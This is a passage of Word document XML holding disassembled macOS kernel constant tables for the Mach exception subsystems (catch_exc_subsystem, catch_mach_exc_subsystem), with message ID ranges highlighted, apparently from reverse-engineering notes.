      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 50h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04320                 dq 3AE22000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00E71757" w:rsidRDefault="00F07003" w:rsidP="00B823FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">atch_exc_subsystem </w:t>
      </w:r>
      <w:r w:rsidR="00B823FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 public catch_exc_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8 ; const catch_exc_subsystem catch_exc_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8 catch_exc_subsystem_0 dq offset exc_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                                         ; DATA XREF: exc_server_routine:loc_FFFFFF8000399DC2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                                         ; exc_server+7Do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02DD8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>961h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02DD8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>964h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 3B4h                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq offset _Xexception_raise; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 6                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 399F6000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E02DD8                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 9                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 db 0B4h, 3, 2 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 3B4h                 ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 39A190h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dq 0Bh                  ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRDefault="00FE0C8E" w:rsidP="00F07003">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>atch_mach_exc_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00F07003">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 public catch_mach_exc_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420 ; const catch_mach_exc_subsystem catch_mach_exc_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420 catch_mach_exc_subsystem_0 dq offset mach_exc_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                                         ; DATA XREF: mach_exc_server_routine:loc_FFFFFF80003A0D72o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                                         ; mach_exc_server+7Do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03420                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>965h</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 968h   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 3B4h                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq offset _Xmach_exception_raise; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03420                 dd 6                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 3A0F1000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
